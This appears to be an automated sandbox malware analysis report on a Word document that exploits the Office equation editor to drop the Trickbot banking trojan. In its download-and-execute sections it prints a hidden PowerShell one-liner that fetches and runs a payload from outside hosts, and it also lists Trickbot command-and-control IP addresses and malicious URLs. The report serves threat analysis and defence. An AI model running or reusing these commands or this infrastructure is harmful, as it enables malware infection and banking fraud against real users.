Analysis Report

Overview

General Information

Joe Sandbox Version:	22.0.0
Analysis ID:	565263
Start time:	16:02:28
Joe Sandbox Product:	Cloud
Start date:	25.05.2018
Overall analysis duration:	0h 21m 9s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	FORMP16T.docx
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 (Office 2010 SP2, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes analysed:	23
Number of new started drivers analysed:	1
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies	HCA enabled EGA enabled GSI enabled (VBA) GSI enabled (Javascript) GSI enabled (Java)
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.evad.expl.troj.winDOCX@23/42@10/4
HCA Information:	Successful, ratio: 100% Number of executed functions: 99 Number of non-executed functions: 86
EGA Information:	Successful, ratio: 100%
Cookbook Comments:	Adjust boot time Correcting counters for adjusted boot time Found application associated with file extension: .docx Found Word or Excel or PowerPoint document Simulate clicks Number of clicks 162 Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): mscorsvw.exe, rundll32.exe, OSPPSVC.EXE, svchost.exe, mrxdav.sys, conhost.exe, WMIADAP.exe, dllhost.exe Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtEnumerateValueKey calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtReadFile calls found. Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: WINWORD.EXE, powershell.exe, ounehcnaykuL.exe, ounehcnaykuM.exe, ounehcnaykuM.exe

Detection

Strategy	Score	Range	Reporting	Detection
Threshold	100	0 - 100	Report FP / FN

Confidence

Strategy	Score	Range	Further Analysis Required?	Confidence
Threshold	5	0 - 5	false

Classification

Analysis Advice

Sample monitors Window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook

Signature Overview

Click to jump to signature section

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider

Show sources

Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Code function: 18_2_001E76E0 CryptAcquireContextW,CryptImportKey,CryptSetKeyParam,CryptSetKeyParam,memcpy,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,	18_2_001E76E0
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Code function: 18_2_001EF590 CryptBinaryToStringW,CryptBinaryToStringW,	18_2_001EF590
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Code function: 18_2_001EF9A0 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	18_2_001EF9A0
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Code function: 18_2_001EBB60 CryptStringToBinaryW,CryptStringToBinaryW,	18_2_001EBB60
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Code function: 21_2_001776E0 CryptAcquireContextW,CryptImportKey,CryptSetKeyParam,CryptSetKeyParam,memcpy,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,	21_2_001776E0
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Code function: 21_2_0017F9A0 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	21_2_0017F9A0
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Code function: 21_2_0017F590 CryptBinaryToStringW,CryptBinaryToStringW,	21_2_0017F590
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Code function: 21_2_0017BB60 CryptStringToBinaryW,CryptStringToBinaryW,	21_2_0017BB60

Spam, unwanted Advertisements and Ransom Demands:

Contains functionality to import cryptographic keys (often used in ransomware)

Show sources

Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Code function: 18_2_001E76E0 CryptAcquireContextW,CryptImportKey,CryptSetKeyParam,CryptSetKeyParam,memcpy,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,		18_2_001E76E0
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Code function: 21_2_001776E0 CryptAcquireContextW,CryptImportKey,CryptSetKeyParam,CryptSetKeyParam,memcpy,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,		21_2_001776E0

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE

Process created: C:\Windows\System32\cmd.exe

Jump to behavior

Office Equation Editor has been started

Show sources

Source: unknown

Process created: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a window with clipboard capturing capabilities

Show sources

Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

E-Banking Fraud:

Detected Trickbot e-Banking trojan config

Show sources

Source: ounehcnaykuM.exe, 00000015.00000002.10777869997.001FC000.00000004.sdmp

String found in binary or memory: <mcconf><ver>1000199</ver><gtag>ser0525</gtag><servs><srv>65.30.201.40:443</srv><srv>66.232.212.59:443</srv><srv>183.54.140.124:443</srv><srv>80.53.57.146:443</srv><srv>31.200.192.251:443</srv><srv>208.75.117.70:449</srv><srv>92.55.251.211:449</srv><srv>94.112.52.197:449</srv><srv>138.34.29.172:443</srv><srv>209.121.142.202:449</srv><srv>5.102.177.205:449</srv><srv>209.121.142.214:449</srv><srv>95.161.180.42:449</srv><srv>203.86.222.142:443</srv><srv>68.96.73.154:449</srv><srv>185.42.192.194:449</srv><srv>68.227.31.46:449</srv><srv>107.144.49.162:443</srv><srv>46.72.175.17:449</srv><srv>144.48.51.8:443</srv><srv>46.243.179.212:449</srv><srv>81.177.255.76:449</srv><srv>193.233.60.148:443</srv><srv>185.174.174.83:443</srv><srv>193.233.62.53:443</srv><srv>91.240.84.224:443</srv><srv>185.228.232.67:443</srv><srv>85.143.215.143:443</srv></servs><autorun><module name="systeminfo" ctl="GetSystemInfo"/><module name="injectDll"/></autorun></mcconf>ies>false</StopIfGoingOnBatteries>

Software Vulnerabilities:

Document exploit detected (creates forbidden files)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user~1\AppData\Local\Temp\task.bat

Jump to behavior

Potential document exploit detected (performs DNS queries with low reputation score)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	DNS query: name: figs4u.co.uk
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	DNS query: name: cypruscars4u.com

Potential document exploit detected (performs DNS queries)

Show sources

Source: global traffic

DNS query: name: cypruscars4u.com

Potential document exploit detected (performs HTTP gets)

Show sources

Source: global traffic

TCP traffic: 192.168.1.16:49191 -> 87.247.241.143:80

Potential document exploit detected (unknown TCP traffic)

Show sources

Source: global traffic

TCP traffic: 192.168.1.16:49188 -> 87.247.241.143:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic

Snort IDS: 2021013 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex CnC) 82.202.221.37:447 -> 192.168.1.16:49197

Detected TCP or UDP traffic on non-standard ports

Show sources

Source: global traffic	TCP traffic: 192.168.1.16:49195 -> 92.55.251.211:449
Source: global traffic	TCP traffic: 192.168.1.16:49197 -> 82.202.221.37:447

Domain name seen in connection with other malware

Show sources

Source: Joe Sandbox View	Domain Name: figs4u.co.uk figs4u.co.uk
Source: Joe Sandbox View	Domain Name: cypruscars4u.com cypruscars4u.com

Downloads files with wrong headers with respect to MIME Content-Type

Show sources

Source: http

Image file has RTF prefix: HTTP/1.1 200 OK Date: Fri, 25 May 2018 14:04:15 GMT Server: Apache Last-Modified: Fri, 25 May 2018 10:39:39 GMT Accept-Ranges: bytes Content-Length: 55287 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 7b 5c 72 74 66 31 7b 5c 70 69 63 74 5c 6a 70 65 67 62 6c 69 70 5c 70 69 63 77 32 34 5c 70 69 63 68 32 34 5c 62 69 6e 31 35 35 35 30 20 ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 64 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 01 20 01 cc 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 01 01 01 01 00 03 01 01 00 00 00 00 00 00 0

May check the online IP address of the machine

Show sources

Source: unknown	DNS query: name: ipinfo.io
Source: unknown	DNS query: name: ipinfo.io
Source: unknown	DNS query: name: ipinfo.io
Source: unknown	DNS query: name: ipinfo.io

Downloads executable code via HTTP

Show sources

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 25 May 2018 14:05:03 GMTServer: ApacheLast-Modified: Fri, 25 May 2018 10:33:56 GMTAccept-Ranges: bytesContent-Length: 270387Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 3d 00 7b de 79 61 15 8d 79 61 15 8d 79 61 15 8d fa 7d 1b 8d 78 61 15 8d 10 7e 1c 8d 7e 61 15 8d 90 7e 18 8d 78 61 15 8d 52 69 63 68 79 61 15 8d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 24 c2 07 5b 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 60 01 00 00 b0 02 00 00 00 00 00 e4 16 00 00 00 10 00 00 00 70 01 00 0

HTTP GET or POST without a user agent

Show sources

Source: global traffic

HTTP traffic detected: GET /logo.bin HTTP/1.1Host: figs4u.co.ukConnection: Keep-Alive

Internet Provider seen in connection with other malware

Show sources

Source: Joe Sandbox View

ASN Name: SELECTELRU SELECTELRU

Uses a known web browser user agent for HTTP communication

Show sources

Source: global traffic	HTTP traffic detected: GET /logo.jpg HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)Accept-Encoding: gzip, deflateHost: cypruscars4u.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36Host: ipinfo.io

Downloads files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word

Jump to behavior

Downloads files from webservers via HTTP

Show sources

Source: global traffic	HTTP traffic detected: GET /logo.jpg HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)Accept-Encoding: gzip, deflateHost: cypruscars4u.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /logo.bin HTTP/1.1Host: figs4u.co.ukConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36Host: ipinfo.io

Found strings which match to known social media urls

Show sources

Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmp	String found in binary or memory: login.yahoo.com equals www.yahoo.com (Yahoo)
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmp	String found in binary or memory: login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmp	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Performs DNS lookups

Show sources

Source: unknown

DNS traffic detected: queries for: cypruscars4u.com

Urls found in memory or binary data

Show sources

Source: powershell.exe, 0000000A.00000002.10093802704.01B10000.00000004.sdmp	String found in binary or memory: file://
Source: powershell.exe, 0000000A.00000002.10093802704.01B10000.00000004.sdmp	String found in binary or memory: file:///
Source: WINWORD.EXE, 00000001.00000002.10277396020.04500000.00000004.sdmp	String found in binary or memory: file:///C:
Source: powershell.exe, 0000000A.00000002.10088000862.0030F000.00000004.sdmp	String found in binary or memory: file:///C:/Users/user~1/AppData/Local/Temp/ounehcnaykuL.exe
Source: WINWORD.EXE, 00000001.00000002.10258196864.00377000.00000004.sdmp	String found in binary or memory: file:///C:/Users/user/AppData/Local/Microsoft/Windows/Temporary%20Internet%20Files/Content.IE5
Source: WINWORD.EXE, 00000001.00000002.10257841806.00316000.00000004.sdmp	String found in binary or memory: file:///C:/Users/user/Desktop/FORMP16T.docxZ
Source: WINWORD.EXE, 00000001.00000002.10257841806.00316000.00000004.sdmp	String found in binary or memory: file:///C:/Users/user/Desktop/FORMP16T.docxl
Source: WINWORD.EXE, 00000001.00000002.10257841806.00316000.00000004.sdmp	String found in binary or memory: file:///C:/Users/user/Desktop/FORMP16T.docx~
Source: powershell.exe, 0000000A.00000002.10088000862.0030F000.00000004.sdmp	String found in binary or memory: file:///C:/Windows/System32/WindowsPowerShell/v1.0/-j).l
Source: powershell.exe, 0000000A.00000002.10088000862.0030F000.00000004.sdmp	String found in binary or memory: file:///C:/Windows/System32/WindowsPowerShell/v1.0/;j).IN
Source: powershell.exe, 0000000A.00000002.10097655852.02151000.00000004.sdmp	String found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/Microsoft.PowerShell.Commands.Diagnostics/1.0.0.0__31bf3856ad36
Source: powershell.exe, 0000000A.00000002.10097655852.02151000.00000004.sdmp	String found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/Microsoft.PowerShell.Commands.Management/1.0.0.0__31bf3856ad364
Source: powershell.exe, 0000000A.00000002.10097655852.02151000.00000004.sdmp	String found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/Microsoft.PowerShell.Commands.Utility/1.0.0.0__31bf3856ad364e35
Source: powershell.exe, 0000000A.00000002.10097655852.02151000.00000004.sdmp	String found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/Microsoft.PowerShell.ConsoleHost/1.0.0.0__31bf3856ad364e35/Micr
Source: powershell.exe, 0000000A.00000002.10097655852.02151000.00000004.sdmp	String found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/Microsoft.PowerShell.Security/1.0.0.0__31bf3856ad364e35/Microso
Source: powershell.exe, 0000000A.00000002.10097655852.02151000.00000004.sdmp	String found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/Microsoft.WSMan.Management/1.0.0.0__31bf3856ad364e35/Microsoft.
Source: powershell.exe, 0000000A.00000002.10097655852.02151000.00000004.sdmp	String found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/System.Management.Automation/1.0.0.0__31bf3856ad364e35/System.M
Source: powershell.exe, 0000000A.00000002.10094025213.01B50000.00000004.sdmp	String found in binary or memory: http://
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmp	String found in binary or memory: http://crl.comodo.net/UTN-USERFirst-Hardware.crl0q
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmp	String found in binary or memory: http://crl.usertrust.com/UTN-USERFirst-Object.crl0)
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmp	String found in binary or memory: http://crt.comodoca.com/UTNAddTrustServerCA.crt0$
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmp, ounehcnaykuM.exe, 00000015.00000002.10780297708.01C40000.00000004.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.21.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmp	String found in binary or memory: http://cybertrust.omniroot.com/repository.cfm0
Source: cypruscars4u.com.url.1.dr	String found in binary or memory: http://cypruscars4u.com/
Source: WINWORD.EXE, 00000001.00000002.10257427295.002D3000.00000004.sdmp	String found in binary or memory: http://cypruscars4u.com/&
Source: WINWORD.EXE, 00000001.00000002.10257427295.002D3000.00000004.sdmp	String found in binary or memory: http://cypruscars4u.com/j
Source: WINWORD.EXE, 00000001.00000002.10257841806.00316000.00000004.sdmp, WINWORD.EXE, 00000001.00000002.10274125297.03080000.00000004.sdmp, WINWORD.EXE, 00000001.00000002.10274326524.031A0000.00000004.sdmp, WINWORD.EXE, 00000001.00000002.10274433979.031C0000.00000004.sdmp, WINWORD.EXE, 00000001.00000003.10250318411.002D2000.00000004.sdmp, logo.jpg.url.1.dr	String found in binary or memory: http://cypruscars4u.com/logo.jpg
Source: WINWORD.EXE, 00000001.00000002.10257841806.00316000.00000004.sdmp	String found in binary or memory: http://cypruscars4u.com/logo.jpgER=E
Source: WINWORD.EXE, 00000001.00000002.10257841806.00316000.00000004.sdmp	String found in binary or memory: http://cypruscars4u.com/logo.jpgSSOO
Source: WINWORD.EXE, 00000001.00000002.10257841806.00316000.00000004.sdmp	String found in binary or memory: http://cypruscars4u.com/logo.jpgT
Source: WINWORD.EXE, 00000001.00000002.10274433979.031C0000.00000004.sdmp	String found in binary or memory: http://cypruscars4u.com/logo.jpgTg
Source: WINWORD.EXE, 00000001.00000002.10274433979.031C0000.00000004.sdmp	String found in binary or memory: http://cypruscars4u.com/logo.jpgUg
Source: WINWORD.EXE, 00000001.00000002.10256887267.001FD000.00000004.sdmp	String found in binary or memory: http://cypruscars4u.com/logo.jpggesktop
Source: WINWORD.EXE, 00000001.00000002.10274433979.031C0000.00000004.sdmp	String found in binary or memory: http://cypruscars4u.com/logo.jpgtion.%Word
Source: WINWORD.EXE, 00000001.00000002.10276262517.03F30000.00000004.sdmp	String found in binary or memory: http://cypruscars4u.comlogo.jpg
Source: powershell.exe, 0000000A.00000002.10095450491.01D62000.00000004.sdmp	String found in binary or memory: http://figs4u.8
Source: powershell.exe, 0000000A.00000002.10094025213.01B50000.00000004.sdmp	String found in binary or memory: http://figs4u.co.uk
Source: powershell.exe, 0000000A.00000002.10086956888.002D4000.00000004.sdmp, powershell.exe, 0000000A.00000002.10093802704.01B10000.00000004.sdmp, powershell.exe, 0000000A.00000002.10094025213.01B50000.00000004.sdmp, powershell.exe, 0000000A.00000003.9981814778.002DD000.00000004.sdmp, task (2).bat.1.dr	String found in binary or memory: http://figs4u.co.uk/logo.bin
Source: powershell.exe, 0000000A.00000003.9981582440.002F0000.00000004.sdmp	String found in binary or memory: http://java.com/
Source: powershell.exe, 0000000A.00000003.9981582440.002F0000.00000004.sdmp	String found in binary or memory: http://java.com/help
Source: powershell.exe, 0000000A.00000003.9981582440.002F0000.00000004.sdmp	String found in binary or memory: http://java.com/helphttp://java.com/help
Source: powershell.exe, 0000000A.00000003.9981582440.002F0000.00000004.sdmp	String found in binary or memory: http://java.com/http://java.com/
Source: WINWORD.EXE, 00000001.00000002.10274644205.0330D000.00000004.sdmp	String found in binary or memory: http://ns.ad
Source: WINWORD.EXE, 00000001.00000002.10274644205.0330D000.00000004.sdmp	String found in binary or memory: http://ns.adbe.
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: cmd.exe, 00000008.00000002.10109548717.00433000.00000004.sdmp	String found in binary or memory: http://respons2
Source: powershell.exe, 0000000A.00000002.10086956888.002D4000.00000004.sdmp, powershell.exe, 0000000A.00000002.10093802704.01B10000.00000004.sdmp, powershell.exe, 0000000A.00000002.10094025213.01B50000.00000004.sdmp, powershell.exe, 0000000A.00000003.9981814778.002DD000.00000004.sdmp, task (2).bat.1.dr	String found in binary or memory: http://responsivepixels.co.uk/logo.bin
Source: WINWORD.EXE, 00000001.00000002.10257159625.00280000.00000004.sdmp	String found in binary or memory: http://schem
Source: WINWORD.EXE, 00000001.00000002.10257159625.00280000.00000004.sdmp	String found in binary or memory: http://schemL?
Source: powershell.exe, 0000000A.00000002.10094025213.01B50000.00000004.sdmp, powershell.exe, 0000000A.00000002.10097655852.02151000.00000004.sdmp	String found in binary or memory: http://schemas.dmtf.org/wbem/wsman/1/cimbinding/associationFilter
Source: powershell.exe, 0000000A.00000002.10094025213.01B50000.00000004.sdmp	String found in binary or memory: http://schemas.dmtf.org/wbem/wsman/1/wsman/SelectorFilter
Source: powershell.exe, 0000000A.00000002.10094025213.01B50000.00000004.sdmp	String found in binary or memory: http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd#IdentifyResponsep
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: WINWORD.EXE, 00000001.00000002.10274217774.03090000.00000004.sdmp	String found in binary or memory: http://www.msnusers.com
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmp	String found in binary or memory: http://www.public-trust.com/CPS/OmniRoot.html0
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmp	String found in binary or memory: http://www.public-trust.com/cgi-bin/CRL/2018/cdp.crl0
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmp	String found in binary or memory: http://www.usertrust.com1
Source: ounehcnaykuM.exe, 00000015.00000002.10780297708.01C40000.00000004.sdmp	String found in binary or memory: https://82.202.221.37:447/ser0525/377142_W617601.5B641C454C296AB7B4B5D897D1FDADEF/5/injectDll32/
Source: ounehcnaykuM.exe, 00000015.00000002.10780297708.01C40000.00000004.sdmp	String found in binary or memory: https://82.202.221.37:447/ser0525/377142_W617601.5B641C454C296AB7B4B5D897D1FDADEF/5/injectDll32/VHK/
Source: ounehcnaykuM.exe, 00000015.00000002.10780297708.01C40000.00000004.sdmp	String found in binary or memory: https://82.202.221.37:447/ser0525/377142_W617601.5B641C454C296AB7B4B5D897D1FDADEF/5/systeminfo32/kE
Source: ounehcnaykuM.exe, 00000015.00000002.10777808439.001D4000.00000004.sdmp	String found in binary or memory: https://92.55.251.211:449/ser0525/377142_W617601.5B641C454C296AB7B4B5D897D1FDADEF/10/62/LNOPIYJTPCBO
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmp	String found in binary or memory: https://92.55.251.211:449/ser0525/377142_W617601.5B641C454C296AB7B4B5D897D1FDADEF/5/spk/
Source: ounehcnaykuM.exe, 00000015.00000002.10777944562.0022E000.00000004.sdmp, ounehcnaykuM.exe, 00000015.00000002.10780297708.01C40000.00000004.sdmp	String found in binary or memory: https://92.55.251.211:449/ser0525/377142_W617601.5B641C454C296AB7B4B5D897D1FDADEF/63/systeminfo/GetS
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0

Remote Access Functionality:

Detected Trickbot Trojan

Show sources

Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe

File created: C:\Users\user\AppData\Roaming\freenet\Modules\systeminfo32

Jump to behavior

Persistence and Installation Behavior:

Contains an external reference to another document

Show sources

Source: webSettings.xml.rels

Binary or memory string: <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/frame" Target="http://cypruscars4u.com/logo.jpg" TargetMode="External"/>

Installs new ROOT certificates

Show sources

Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Tries to download and execute files (via powershell)

Show sources

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -W Hidden ''function jester18([String] $hothenry){(New-Object System.Net.WebClient).DownloadFile($hothenry,'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe');Start-Process 'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe';}try{jester18('http://figs4u.co.uk/logo.bin')}catch{jester18('http://responsivepixels.co.uk/logo.bin')}''
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -W Hidden ''function jester18([String] $hothenry){(New-Object System.Net.WebClient).DownloadFile($hothenry,'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe');Start-Process 'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe';}try{jester18('http://figs4u.co.uk/logo.bin')}catch{jester18('http://responsivepixels.co.uk/logo.bin')}''			Jump to behavior

Drops PE files

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe	File created: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe			Jump to dropped file

Data Obfuscation:

Powershell starts a process from the temp directory

Show sources

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -W Hidden ''function jester18([String] $hothenry){(New-Object System.Net.WebClient).DownloadFile($hothenry,'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe');Start-Process 'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe';}try{jester18('http://figs4u.co.uk/logo.bin')}catch{jester18('http://responsivepixels.co.uk/logo.bin')}''
